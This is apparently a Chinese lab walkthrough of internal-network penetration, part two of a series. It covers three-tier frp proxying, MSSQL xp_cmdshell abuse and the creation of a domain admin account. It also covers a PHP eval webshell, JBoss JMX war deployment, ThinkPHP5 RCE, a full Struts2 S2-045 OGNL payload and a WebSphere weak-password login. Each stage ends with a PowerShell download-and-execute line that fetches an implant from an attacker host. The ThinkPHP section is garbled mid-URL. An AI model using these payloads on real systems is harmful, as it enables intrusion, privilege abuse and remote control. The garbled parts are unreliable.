实战渗透域森林+服务森林(下)
实战渗透域森林+服务森林(下)
接上篇的实战渗透域森林+服务森林(上),上篇文章中只讲到了一级和二级代理、域渗透常规操作以及部分服务攻防,本篇就主要涉及到frp的三级代理和服务攻防的相关知识了。
0x09 攻击独立域控服务器
之前在子域中子域中发现存在10.12.10.0/24网段,通过nbtscan发现存在10.12.10.3这台主机
一、建立二级frp
上线CS需要建立二级frp通道
(一)相关配置
子域域控frpc.ini配置如下
[common]
server_addr = 10.10.10.101
server_port = 13000
[http_proxy]
type = tcp
remote_port = 1097
plugin = socks5
Web服务器frps.ini配置如下
[common]
bind_addr = 10.10.10.101
bind_port = 13000
Web服务器frpc.ini配置如下
[common]
server_addr = 1.117.58.131
server_port = 13000
[http_proxy]
type = tcp
local_ip = 10.10.10.101
local_port = 1097
remote_port = 1097
公网服务器frps.ini配置如下
[common]
bind_addr = 0.0.0.0
bind_port = 13000
(二)命令执行
首先先开启服务端的frp,在web服务器和公网服务器下执行如下命令
frps.exe -c frps.ini
./frps -c frps.ini
之后在子域域控中执行
frpc.exe -c frpc.ini
最后在web服务器中执行
frpc.exe -c frpc.ini
在proxychains添加代理
vim /etc/proxychains.conf
二、信息收集
通过fscan对10.12.10.3进行扫描
扫描结果存在MSSQL数据库,账号密码为sa/admin@123
三、MSSQL命令执行利用并上线CS
首先使用MSF针对SQLserver的利用模块
msfconsole
# 设置代理
msf > setg Proxies socks5:1.117.58.131:1097
msf > setg ReverseAllowProxy true
# 使用攻击模块
msf > use admin/mssql/mssql_exec
msf > set CMD whoami
msf > set RHOSTS 10.12.10.3
msf > set PASSWORD admin@123
msf > run
之后创建用户
msf > set CMD net user mac 123QWEasd /add
msf > set CMD net localgroup administrators mac /add
但是报错,于是通过代理使用navicat连接mssql
查询xp_cmd是否开启
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
返回1说明开启
如果没有开启可以执行以下命令进行开启
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;
命令执行,添加用户并添加到admins组
master..xp_cmdshell 'net user mac /domain' #发现mac用户已添加
master..xp_cmdshell 'net group "domain admins" mac /add /domain'
于是在子域控中建立ipc$
shell net use \\10.12.10.3\ipc$ "123QWEasd" /user:10.12.10.3\mac
dir \\10.12.10.3\c$
在子域控中设置中转监听同时生成mac4.exe
将mac4.exe上传到子域控中,通过IPC复制到10.12.10.3
shell copy mac4.exe \\10.12.10.3\c$
shell dir \\10.12.10.3\c$
可以通过navicat连接数据库执行命令上线CS
master..xp_cmdshell 'cd C:\
写入木马到网站目录下
select '?php @eval($_POST[mac]);?>' into outfile 'C:/phpStudy/WWW/mac2.php';
设置蚁剑代理,连接http://20.20.20.199/mac2.php,成功上线
设置中转监听,并生成木马mac5.exe
在蚁剑中上传mac5.exe并执行
0x11 攻击JBOSS独立机
一、信息收集
通过fscan发现http://20.20.20.101:8080
proxychains firefox http://20.20.20.101:8080
为JBOSS中间件,可能存在JMX Console未授权访问漏洞
二、JMX Console未授权访问漏洞利用并上线CS
找到Jboss-system中的MainDepolyer
在20.20.20.199的http界面中上传war包
打包war包
jar -cvf mac.war "mac.jsp"
在JBOSS中远程(deploy)部署http://20.20.20.199/mac.war,点击invoke
访问网址http://20.20.20.101:8080/mac/mac.jsp,已成功部署
执行以下命令上线CS
powershell (new-object System.Net.WebClient).DownloadFile('http://20.20.20.199/mac5.exe','mac5.exe');start-process mac5.exe
0x12 攻击ThinkPHP独立机
一、信息收集
通过fscan扫描到该主机存在http服务,通过代理进行访问
proxychains firefox http://20.20.20.102
显示为ThinkPHP v5框架,可能存在远程代码执行漏洞
二、ThinkPHP5.x远程代码执行漏洞利用并上线CS
首先验证是否存在该漏洞
http://20.20.20.102/index.php?s=/Index/\think\app/invokefunction?php @eval($_POST[mac]);?>
url编码后:
%3c%3f%70%68%70%20%40%65%76%61%6c%28%24%5f%50%4f%53%54%5b%6d%61%63%5d%29%3b%3f%3e
将参数进行替换
http://20.20.20.102/index.php?s=/index/\think\app/invokefunctionstart-process mac5.exe
powershell.exe (new-object System.Net.WebClient).DownloadFile('http://20.20.20.199/mac5.exe','mac5.exe');start-process mac5.exe
powershell (new-object System.Net.WebClient).DownloadFile('http://20.20.20.199/mac5.exe','mac5.exe');start-process mac5.exe
这台一直出现问题,无法上线
0x14 攻击Struts2独立机
一、信息收集
通过fscan扫描8080端口存在web服务,访问http://20.20.20.104:8080
proxychains firefox http://20.20.20.104:8080
为Tomcat界面,访问目录S2-045,判断可能存在Struts2系列框架漏洞
二、Struts2-045漏洞利用并上线CS
通过burp抓取数据包,需先设置代理
POST /S2-045/fileupload/doUpload.action HTTP/1.1
Host: 20.20.20.104:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='powershell -Command (new-object System.Net.WebClient).DownloadFile(\'http://20.20.20.199/mac5.exe\',\'mac5.exe\');start-process mac5.exe').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} boundary=---------------------------255663886332559909593529682920
Content-Length: 344
Origin: http://20.20.20.104:8080
Connection: close
Referer: http://20.20.20.104:8080/S2-045/fileupload/upload.action
Cookie: JSESSIONID=7B84132FC14F461D411AEBE4DA902C2AA
Upgrade-Insecure-Requests: 1
-----------------------------255663886332559909593529682920
Content-Disposition: form-data; name="upload"; filename=""
Content-Type: application/octet-stream
-----------------------------255663886332559909593529682920
Content-Disposition: form-data; name="caption"
aaa
-----------------------------255663886332559909593529682920--
执行后,成功上线CS
0x15 攻击WebSphere独立机
一、信息收集
通过railgun工具扫描端口信息,发现9060和9043是WebSphere使用的端口
访问http://20.20.20.105:9043/ibm/console/logon.jsp
proxychains firefox https://20.20.20.105:9043/ibm/console/logon.jsp
二、弱口令利用并上线CS
通过弱口令admin/admin@123登录,存在WebSphere中间件漏洞
选择新增企业版应用,之后部署war包
之后一直下一步,直到选填路径
完成并保存,选择刚刚部署的war包开始运行
访问http://20.20.20.105:9080/mac/mac.jsp
执行命令上线CS
powershell (new-object System.Net.WebClient).DownloadFile('http://20.20.20.199/mac5.exe','mac5.exe');start-process mac5.exe
最后成功上线CS
0x16 总结
本次域渗透+服务攻防的通关让我对内网渗透的理解更加透彻,其中建立代理是打内网的关键,其他的话和平时渗透差不多。感谢大家看完这一长篇的笔记,欢迎大家在评论区留言交流。最后附上通关图。